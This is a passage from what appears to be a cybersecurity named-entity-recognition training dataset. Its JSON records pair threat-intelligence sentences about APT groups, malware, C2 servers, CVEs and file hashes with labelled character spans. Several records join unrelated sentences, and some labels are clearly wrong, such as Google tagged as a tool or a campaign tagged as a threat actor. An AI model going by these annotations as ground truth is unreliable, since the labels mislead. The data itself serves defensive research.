exfiltration . this SWC was used to specifically target Turkish banking .", "spans": {"THREAT_ACTOR: ScarCruft": [[4, 13]], "ORGANIZATION: banking": [[224, 231]]}, "info": {"id": "cyberner_stix_train_003432", "source": "cyberner_stix_train"}} {"text": "While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered “ loud. 
” These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server .", "spans": {"TOOL: command and control": [[258, 277]], "TOOL: C&C": [[280, 283]]}, "info": {"id": "cyberner_stix_train_003433", "source": "cyberner_stix_train"}} {"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": {}, "info": {"id": "cyberner_stix_train_003434", "source": "cyberner_stix_train"}} {"text": "If that part is found , the app loads Javascript snippets from the JSON parameters to click a button or other HTML element , simulating a real user click . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns . The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics , both to better anticipate the election outcome and to gather additional intelligence on politicians , activists , and others who interact with journalists . Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": {"TOOL: NetTraveler": [[156, 167]], "ORGANIZATION: diplomats": [[192, 201]], "ORGANIZATION: embassies": [[204, 213]], "ORGANIZATION: government institutions": [[218, 241]], "ORGANIZATION: Chinese government": [[357, 375]], "ORGANIZATION: Popular tax preparation software companies": [[619, 661]], "ORGANIZATION: lawmakers": [[682, 691]], "TOOL: Google": [[771, 777]], "TOOL: Meta": [[782, 786]]}, "info": {"id": "cyberner_stix_train_003435", "source": "cyberner_stix_train"}} {"text": "The official “ Golden Cup ” Facebook page . 
FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests . The information for this specific sample is listed below . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"MALWARE: Golden Cup": [[15, 25]], "SYSTEM: Facebook": [[28, 36]], "ORGANIZATION: FireEye": [[44, 51]], "THREAT_ACTOR: APT32": [[66, 71]], "ORGANIZATION: Talos researchers": [[317, 334]], "TOOL: Open Babel": [[383, 393]]}, "info": {"id": "cyberner_stix_train_003436", "source": "cyberner_stix_train"}} {"text": "As part of their activities , they are known for hijacking DNS settings on Japanese routers that redirect users to malicious IP addresses , creating disguised malicious Android apps that appear as popular apps , stealing Apple ID credentials by creating Apple phishing pages , as well as performing web crypto mining on browsers . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . This time , APT15 opted for a DNS based backdoor : RoyalDNS .", "spans": {"SYSTEM: Android": [[169, 176]], "ORGANIZATION: Apple": [[221, 226], [254, 259]], "THREAT_ACTOR: FIN7": [[331, 335]], "THREAT_ACTOR: APT15": [[483, 488]], "MALWARE: DNS based backdoor": [[501, 519]], "MALWARE: RoyalDNS": [[522, 530]]}, "info": {"id": "cyberner_stix_train_003437", "source": "cyberner_stix_train"}} {"text": "The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 . If ZxShell successfully connects to the remote host , the function DoHandshake is called . 
As 2021 ends , one critical theme remains constant within the world of enterprise security ransomware attacks are continuing to rise , yearoveryear , across private and public entities .", "spans": {"MALWARE: ZxShell": [[273, 280]], "ORGANIZATION: private and public entities": [[518, 545]]}, "info": {"id": "cyberner_stix_train_003438", "source": "cyberner_stix_train"}} {"text": "the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories .", "spans": {"MALWARE: Asacub": [[157, 163]], "MALWARE: CraP2P": [[166, 172]], "TOOL: Locky": [[234, 239]], "TOOL: Dridex": [[244, 250]], "MALWARE: backdoor Trojan": [[383, 398]], "MALWARE: Volgmer": [[401, 408]]}, "info": {"id": "cyberner_stix_train_003439", "source": "cyberner_stix_train"}} {"text": "Others like transferbot , promptupdate and promptuninstall are meant to help the operator manage the malware . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families . This helped disguise their activities . 
Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user ’s email address and password ) .", "spans": {"TOOL: White Lambert samples": [[196, 217]], "TOOL: White": [[264, 269]], "TOOL: Pink Lambert malware families": [[274, 303]], "MALWARE: malicious JavaScript request": [[381, 409]]}, "info": {"id": "cyberner_stix_train_003440", "source": "cyberner_stix_train"}} {"text": "The malware contains a list of 209 packages hardcoded in its source code . Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East . This could be an attempt to evade sandbox analysis as mouse and keyboard movement is typically not performed . However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": {"THREAT_ACTOR: group": [[94, 99]], "VULNERABILITY: reused code associated with the cyber range to develop this malware": [[441, 508]]}, "info": {"id": "cyberner_stix_train_003441", "source": "cyberner_stix_train"}} {"text": "In addition , it collects identifiers and some data from the device . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) . 
Ursnif Variant 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 ea7e1650031c92b7377788f05926034e Ursnif Variant 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d 377cd85d8d68fc58976a123aa151c5e0 Ursnif Variant 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 b73cbffea8094cfa18b067d9568c53e7 Ursnif Variant e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 24fe5a6196e32749cd030ab51824cabe Ursnif Variant 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de 589734cb60aa515599c687539c520049 . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"THREAT_ACTOR: OceanLotus": [[70, 80]], "THREAT_ACTOR: APT32": [[97, 102]], "THREAT_ACTOR: APT group": [[139, 148]], "MALWARE: Ursnif": [[255, 261], [368, 374], [481, 487], [594, 600], [707, 713]], "FILEPATH: 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0": [[270, 334]], "FILEPATH: ea7e1650031c92b7377788f05926034e": [[335, 367]], "FILEPATH: 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d": [[383, 447]], "FILEPATH: 377cd85d8d68fc58976a123aa151c5e0": [[448, 480]], "FILEPATH: 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889": [[496, 560]], "FILEPATH: b73cbffea8094cfa18b067d9568c53e7": [[561, 593]], "FILEPATH: e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52": [[609, 673]], "FILEPATH: 24fe5a6196e32749cd030ab51824cabe": [[674, 706]], "FILEPATH: 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de": [[722, 786]], "FILEPATH: 589734cb60aa515599c687539c520049": [[787, 819]], "ORGANIZATION: Cisco Talos": [[822, 833]], "TOOL: Foxit PDF Reader": [[970, 986]], "TOOL: Adobe Acrobat": [[1040, 1053]]}, "info": {"id": "cyberner_stix_train_003442", "source": "cyberner_stix_train"}} {"text": "House Speaker 
Nancy Pelosi later confirmed that the DCCC had suffered a network compromise .", "spans": {"ORGANIZATION: DCCC": [[52, 56]]}, "info": {"id": "cyberner_stix_train_003443", "source": "cyberner_stix_train"}} {"text": "CVE-2015-6585 : Hangul Word Processor Vulnerability .", "spans": {"VULNERABILITY: CVE-2015-6585": [[0, 13]], "TOOL: Hangul Word Processor": [[16, 37]]}, "info": {"id": "cyberner_stix_train_003444", "source": "cyberner_stix_train"}} {"text": "Figure 14 : disabling infected apps auto-update Figure 15 : changing the settings of the update timeout The Ad Displaying Payload Following all of the above , now is the time to take a look into the actual payload that displays ads to the victim . The campaign was active until January 2014 , but during our investigations the C&C servers were shut down . Next , the loader DLL E-TOOL targets the setup.exe file in SysWoW64 . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"TOOL: the loader": [[363, 373]], "TOOL: DLL E-TOOL": [[374, 384]], "FILEPATH: setup.exe": [[397, 406]], "SYSTEM: SysWoW64": [[415, 423]], "ORGANIZATION: Malwarebytes": [[426, 438]]}, "info": {"id": "cyberner_stix_train_003445", "source": "cyberner_stix_train"}} {"text": "As Talos observed at the beginning of 2017 , Group 123 started a campaign corresponding with the new year in 2018 . 
The Trojan is quite similar to the .NET RocketMan Trojan Obviously and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"ORGANIZATION: Talos": [[3, 8]], "THREAT_ACTOR: Group 123": [[45, 54]], "MALWARE: Trojan": [[120, 126], [166, 172]], "TOOL: .NET": [[151, 155]], "MALWARE: RocketMan": [[156, 165]]}, "info": {"id": "cyberner_stix_train_003446", "source": "cyberner_stix_train"}} {"text": "Unfortunately , at the time of collection , the C2 domain had been sinkholed by a third party .", "spans": {"TOOL: C2": [[48, 50]]}, "info": {"id": "cyberner_stix_train_003447", "source": "cyberner_stix_train"}} {"text": "In our research , we focus on the most recent sample , an application dubbed as \" Golden Cup '' , launched just before the start of World Cup 2018 . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years . In this instance it is saved to the C:\\ProgramData directory with a pseudo random name . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": {"MALWARE: Golden Cup": [[82, 92]], "ORGANIZATION: Mandiant": [[149, 157]], "TOOL: POSHSPY": [[179, 186]], "THREAT_ACTOR: APT29": [[232, 237]]}, "info": {"id": "cyberner_stix_train_003448", "source": "cyberner_stix_train"}} {"text": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . 
APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank .", "spans": {"ORGANIZATION: Cisco": [[80, 85]], "ORGANIZATION: ESET": [[106, 110]], "THREAT_ACTOR: APT38": [[212, 217]], "MALWARE: DYEPACK": [[228, 235]], "ORGANIZATION: bank": [[394, 398]]}, "info": {"id": "cyberner_stix_train_003449", "source": "cyberner_stix_train"}} {"text": "Some versions of the Skygofree feature the self-protection ability exclusively for Huawei devices . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity .", "spans": {"MALWARE: Skygofree": [[21, 30]], "ORGANIZATION: Huawei": [[83, 89]], "MALWARE: JavaScript": [[104, 114]], "THREAT_ACTOR: APT41": [[329, 334]]}, "info": {"id": "cyberner_stix_train_003450", "source": "cyberner_stix_train"}} {"text": "Once connected to the pipe , a user or a program can easily provide information required to execute command ( just as they would normally through a command-line ) .", "spans": {}, "info": {"id": "cyberner_stix_train_003451", "source": "cyberner_stix_train"}} {"text": "WhatsApp message capture The service com.serenegiant.service.ScreenRecorderService , is invoked by the ScreenRecorderActivity . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . It is worth noting that this email appeared to have been sent from another Taiwanese Government employee , implying that the email was sent from a valid but compromised account . 
Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": {"SYSTEM: WhatsApp": [[0, 8]], "TOOL: email": [[412, 417], [508, 513]], "ORGANIZATION: Taiwanese Government": [[458, 478]], "MALWARE: TrickBot": [[567, 575]], "SYSTEM: C2": [[627, 629]]}, "info": {"id": "cyberner_stix_train_003452", "source": "cyberner_stix_train"}} {"text": "A \" Tracking tool '' or an \" Admin tool '' are often cited for these kinds of tools for \" commercial '' or \" enterprise '' usage . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . Though public disclosures resulted in APT12 adaptations , FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels . In fact , this chain also leads to NetSupport RAT .", "spans": {"TOOL: legitimate traffic": [[148, 166]], "THREAT_ACTOR: APT12": [[272, 277], [331, 336]], "ORGANIZATION: FireEye": [[292, 299]], "TOOL: NetSupport RAT": [[443, 457]]}, "info": {"id": "cyberner_stix_train_003453", "source": "cyberner_stix_train"}} {"text": "PlugX — A remote access tool notable for communications that may contain HTTP headers starting with \" X- \" ( e.g. , \" X-Session : 0 \" ) .", "spans": {"MALWARE: PlugX": [[0, 5]], "TOOL: X-Session": [[118, 127]]}, "info": {"id": "cyberner_stix_train_003454", "source": "cyberner_stix_train"}} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "ORGANIZATION: TAA": [[176, 179]], "ORGANIZATION: telecoms operator": [[210, 227]]}, "info": {"id": "cyberner_stix_train_003455", "source": "cyberner_stix_train"}} {"text": "Doing so executes code checking if the device is manufactured by Xiaomi , or if Xiaomi ’ s fork of Android is running on the device . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not always correlate with targeted users or organizations . Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": {"ORGANIZATION: Xiaomi": [[65, 71]], "ORGANIZATION: Xiaomi ’ s": [[80, 90]], "SYSTEM: Android": [[99, 106]], "THREAT_ACTOR: APT41": [[134, 139]], "THREAT_ACTOR: APT28": [[357, 362]]}, "info": {"id": "cyberner_stix_train_003456", "source": "cyberner_stix_train"}} {"text": "Other cyberespionage groups , including Black Vine and Hidden Lynx , have also used stolen certificates in their campaigns .", "spans": {"THREAT_ACTOR: Black Vine": [[40, 50]], "THREAT_ACTOR: Hidden Lynx": [[55, 66]]}, "info": {"id": "cyberner_stix_train_003457", "source": "cyberner_stix_train"}} {"text": "Unfortunately , we were unable to get any C2 S-TOOL servers to issue download commands to any samples that we tested in our lab .", "spans": {"TOOL: C2 S-TOOL servers": [[42, 59]]}, "info": {"id": "cyberner_stix_train_003458", "source": "cyberner_stix_train"}} {"text": "The traffic transits in clear and is therefore potentially exposed to man-in-the-middle attacks : At the same time , null will also bind a local shell on 0.0.0.0:6842 . 
On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack . Meeting Agenda.pdf : That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": {"TOOL: Nidiran back door": [[359, 376]], "FILEPATH: Meeting Agenda.pdf": [[414, 432]], "MALWARE: BlackSuit": [[475, 484]], "MALWARE: Royal ransomware": [[552, 568]]}, "info": {"id": "cyberner_stix_train_003459", "source": "cyberner_stix_train"}} {"text": "2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one – appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible . In Operation Sheep’s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . APT12 is a threat group that has been attributed to China .", "spans": {"THREAT_ACTOR: Shun Wang": [[259, 268]], "THREAT_ACTOR: APT12": [[356, 361]]}, "info": {"id": "cyberner_stix_train_003460", "source": "cyberner_stix_train"}} {"text": "From the outside , they are indistinguishable from the legitimate applications . Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version . It is not directly used from msvcrt.dll but is instead copied to another memory chunk before being called . 
They claim to have compromised the company and are willing to help resolve the issue .", "spans": {"FILEPATH: msvcrt.dll": [[291, 301]]}, "info": {"id": "cyberner_stix_train_003461", "source": "cyberner_stix_train"}} {"text": "Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts .", "spans": {"THREAT_ACTOR: Suckfly": [[31, 38]], "MALWARE: Nidiran": [[48, 55]]}, "info": {"id": "cyberner_stix_train_003462", "source": "cyberner_stix_train"}} {"text": "A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped .", "spans": {"MALWARE: Shamoon": [[14, 21]]}, "info": {"id": "cyberner_stix_train_003463", "source": "cyberner_stix_train"}} {"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . 
We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"THREAT_ACTOR: attackers": [[574, 583]], "ORGANIZATION: victims who answer": [[593, 611]], "TOOL: Bluetooth": [[842, 851]]}, "info": {"id": "cyberner_stix_train_003464", "source": "cyberner_stix_train"}} {"text": "How it Works In order to get into the Google Play Store , the malware uses a phased approach which is quite a common practice for malware authors these days . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor . The samples had minor changes , and were presumably changed by the attackers to avoid detection by hash . Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics .", "spans": {"SYSTEM: Google Play": [[38, 49]], "THREAT_ACTOR: APT32": [[159, 164]], "TOOL: Cobalt Strike backdoor": [[233, 255]], "THREAT_ACTOR: Threat actors": [[364, 377]], "THREAT_ACTOR: Winnti group": [[387, 399]]}, "info": {"id": "cyberner_stix_train_003465", "source": "cyberner_stix_train"}} {"text": "As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . As a result , it is already flagged as Bahamut by antivirus engines .", "spans": {"VULNERABILITY: CVE-2017-11882": [[28, 42]], "VULNERABILITY: CVE-2018-0802": [[47, 60]], "TOOL: weaponizer": [[67, 77]], "THREAT_ACTOR: actors": [[126, 132]]}, "info": {"id": "cyberner_stix_train_003466", "source": "cyberner_stix_train"}} {"text": "Bread has used a few tricks to keep strings in plaintext while preventing basic string matching . In one case in late 2014 , APT5 breached the network of an international telecommunications company . Shutdown Logout , shutdown or restart the target system . 
Check the flag T as indicator if single stepping .", "spans": {"MALWARE: Bread": [[0, 5]], "ORGANIZATION: international telecommunications company": [[157, 197]]}, "info": {"id": "cyberner_stix_train_003467", "source": "cyberner_stix_train"}} {"text": "In addition future Trojans could leverage root exploits to make them almost impossible to remove and give malicious actors the ability to hook generic low level API ’ s that are used by all ( banking ) applications , just like the attack vector as has been used on the desktop platform for years . Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway . ZxShell is one sample amongst several tools that Group 72 used within their campaign . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": {"TOOL: RAR": [[364, 367]], "MALWARE: ZxShell": [[426, 433]], "THREAT_ACTOR: Group 72": [[475, 483]]}, "info": {"id": "cyberner_stix_train_003468", "source": "cyberner_stix_train"}} {"text": "Phone number for administration changeServer : At this point , the malware changes the C2 to a new host , even though the API and communication protocol continues to be the same . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . The malware supports the following capabilities : Terminate specific process、Enumerate processes、Upload file、Download file、Delete file、List folder contents、Enumerate storage volumes、Execute a command、Reverse shell、Take a screenshot . 
Conducted for commercial or financial purposes , corporate espionage involves", "spans": {"TOOL: DNSMessenger": [[247, 259]], "TOOL: MuddyWater": [[264, 274]]}, "info": {"id": "cyberner_stix_train_003469", "source": "cyberner_stix_train"}} {"text": "The code above changes the font color to black within the specified cell range and presents the content to the user .", "spans": {}, "info": {"id": "cyberner_stix_train_003470", "source": "cyberner_stix_train"}} {"text": "Firewalls provide security to make your network less susceptible to attack .", "spans": {"TOOL: Firewalls": [[0, 9]]}, "info": {"id": "cyberner_stix_train_003471", "source": "cyberner_stix_train"}} {"text": "The pushTAN method has a clear advantage : It improves security by mitigating the risk of SIM swapping attacks and SMS stealers . Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East .", "spans": {"ORGANIZATION: Mandiant": [[147, 155]], "ORGANIZATION: Unit 42": [[299, 306]], "THREAT_ACTOR: actors": [[374, 380]]}, "info": {"id": "cyberner_stix_train_003472", "source": "cyberner_stix_train"}} {"text": "The macro obtains the document saved to the system from within the document stored as UserForm1.Label1.Caption and will write it to : %TEMP%\\~temp.docm .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: UserForm1.Label1.Caption": [[86, 110]], "FILEPATH: %TEMP%\\~temp.docm": [[134, 151]]}, "info": {"id": "cyberner_stix_train_003473", "source": "cyberner_stix_train"}} {"text": "However , a white font color is applied to the text to make it appear that the victim must enable macros to access the content .", "spans": {}, "info": {"id": "cyberner_stix_train_003474", 
"source": "cyberner_stix_train"}} {"text": "Our intelligence shows “ Agent Smith ” droppers proliferate through third-party app store “ 9Apps ” , a UC team backed store , targeted mostly at Indian ( Hindi ) , Arabic , and Indonesian users . We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers . Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign . Dynamic Resolution During the SolarWinds Compromise , APT29 used dynamic DNS resolution to construct and resolve to randomly - generated subdomains for C2.[12 ]", "spans": {"MALWARE: Agent Smith": [[25, 36]], "SYSTEM: 9Apps": [[92, 97]], "ORGANIZATION: antivirus companies": [[286, 305]], "TOOL: Microsoft Defender": [[332, 350]], "MALWARE: Dexphot": [[452, 459]], "THREAT_ACTOR: SolarWinds Compromise": [[501, 522]], "THREAT_ACTOR: APT29": [[525, 530]]}, "info": {"id": "cyberner_stix_train_003475", "source": "cyberner_stix_train"}} {"text": "If /sdcard/MemosForNotes was present on the device , the Chrysaor app removes itself from the device . The actor has conducted operations since at least 2013 in support of China 's naval modernization effort . The apex domain was set to redirect to a relevant legitimate site using the Namecheap redirection service , while the subdomain points to the malicious C&C server . 
None The motives have not yet been definitively determined , but are guessed to be the result of a oneoff attempt to gather intelligence that potentially can be used in further phishing campaigns .", "spans": {"MALWARE: Chrysaor": [[57, 65]], "THREAT_ACTOR: actor": [[107, 112]], "TOOL: Namecheap": [[286, 295]]}, "info": {"id": "cyberner_stix_train_003476", "source": "cyberner_stix_train"}} {"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet .", "spans": {"TOOL: PingCastle MS17-010": [[71, 90]], "VULNERABILITY: EternalBlue": [[218, 229]], "FILEPATH: winword.exe": [[355, 366]], "FILEPATH: Start-Process": [[385, 398]], "FILEPATH: cmdlet": [[399, 405]]}, "info": {"id": "cyberner_stix_train_003477", "source": "cyberner_stix_train"}} {"text": "Symantec has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . 
It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Patchwork": [[38, 47]], "THREAT_ACTOR: Dropping Elephant": [[64, 81]], "MALWARE: MoonWind": [[185, 193]]}, "info": {"id": "cyberner_stix_train_003478", "source": "cyberner_stix_train"}} {"text": "When the victim opens the attached word document it prompts the user to enable macro content and both the documents ( Uri Terror Report.doc and mha-report.doc ) displayed the same content and contained a Show Document button .", "spans": {"TOOL: attached word document": [[26, 48]], "FILEPATH: Uri Terror Report.doc": [[118, 139]], "FILEPATH: mha-report.doc": [[144, 158]]}, "info": {"id": "cyberner_stix_train_003479", "source": "cyberner_stix_train"}} {"text": "The ActionScript relies on event listeners to call specific functions when the event “ Event.COMPLETE ” is triggered after successful HTTP requests are issued to the C2 server .", "spans": {"TOOL: ActionScript": [[4, 16]], "FILEPATH: Event.COMPLETE": [[87, 101]], "TOOL: C2": [[166, 168]]}, "info": {"id": "cyberner_stix_train_003480", "source": "cyberner_stix_train"}} {"text": "CrowdStrike® Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . 
For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"ORGANIZATION: CrowdStrike® Intelligence": [[0, 25]], "THREAT_ACTOR: PINCHY SPIDER": [[48, 61]], "TOOL: GandCrab ransomware": [[83, 102]], "ORGANIZATION: civil society": [[394, 407]], "ORGANIZATION: diaspora": [[412, 420]]}, "info": {"id": "cyberner_stix_train_003481", "source": "cyberner_stix_train"}} {"text": "Although at first glance this appears somewhat complex , it is in fact a rather simple , repeated keyboard sequence .", "spans": {}, "info": {"id": "cyberner_stix_train_003482", "source": "cyberner_stix_train"}} {"text": "The information collected by the malware and the control over the victim 's mobile device allows their operators to perform more complex social engineering attacks . The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . OceanLotus : 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Loader #2 . 
It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": {"ORGANIZATION: managed IT service providers": [[240, 268]], "ORGANIZATION: MSPs": [[271, 275], [383, 387]], "THREAT_ACTOR: APT10": [[289, 294]], "THREAT_ACTOR: OceanLotus": [[417, 427]], "FILEPATH: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[430, 494]], "ORGANIZATION: Rostelecom - Solar": [[596, 614]], "ORGANIZATION: Russian Ministry of Energy": [[649, 675]], "ORGANIZATION: SPIEF": [[697, 702]]}, "info": {"id": "cyberner_stix_train_003483", "source": "cyberner_stix_train"}} {"text": "At runtime , the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address . The ZxShell driver starts by acquiring some kernel information and then hooking “ ObReferenceObjectByHandle ” API . UNC4899 's targeting is selective , and they have been observed gaining access to victim networks through JumpCloud .", "spans": {"MALWARE: ZxShell": [[310, 317]], "ORGANIZATION: UNC4899 's targeting": [[422, 442]], "TOOL: JumpCloud": [[528, 537]]}, "info": {"id": "cyberner_stix_train_003484", "source": "cyberner_stix_train"}} {"text": "A few days later they can cancel the trial and do not need to pay a penny . In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user . So , static analysis on the “ 6323 ” file shown as its nature : it is written using Microsoft Visual Studio .NET , therefore easily to reverse . 
These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": {"THREAT_ACTOR: actor": [[167, 172]], "FILEPATH: 6323": [[280, 284]], "TOOL: Microsoft Visual Studio .NET": [[333, 361]], "MALWARE: COSMICENERGY": [[445, 457]]}, "info": {"id": "cyberner_stix_train_003485", "source": "cyberner_stix_train"}} {"text": "Ongoing activity While monitoring this particular threat , we found another XLoader variant posing as a pornography app aimed at South Korean users . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 . Note the request number parameter is now 0001: 39e965e000caD60001679C79T.sample-domain.evil . The ransomware is a 64bit executable written in Rust and it recognises the following commandline parameters", "spans": {"MALWARE: XLoader": [[76, 83]], "ORGANIZATION: media organizations": [[228, 247]], "THREAT_ACTOR: APT16": [[291, 296]], "FILEPATH: 39e965e000caD60001679C79T.sample-domain.evil": [[346, 390]], "MALWARE: ransomware": [[397, 407]], "MALWARE: 64bit executable": [[413, 429]], "TOOL: Rust": [[441, 445]]}, "info": {"id": "cyberner_stix_train_003486", "source": "cyberner_stix_train"}} {"text": "The details of this attribution is explained in a dedicated section below .", "spans": {}, "info": {"id": "cyberner_stix_train_003487", "source": "cyberner_stix_train"}} {"text": "WebView JavaScript Interface Continuing on the theme of cross-language bridges , Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 . This set of functionality allows the operator complete control of a system . 
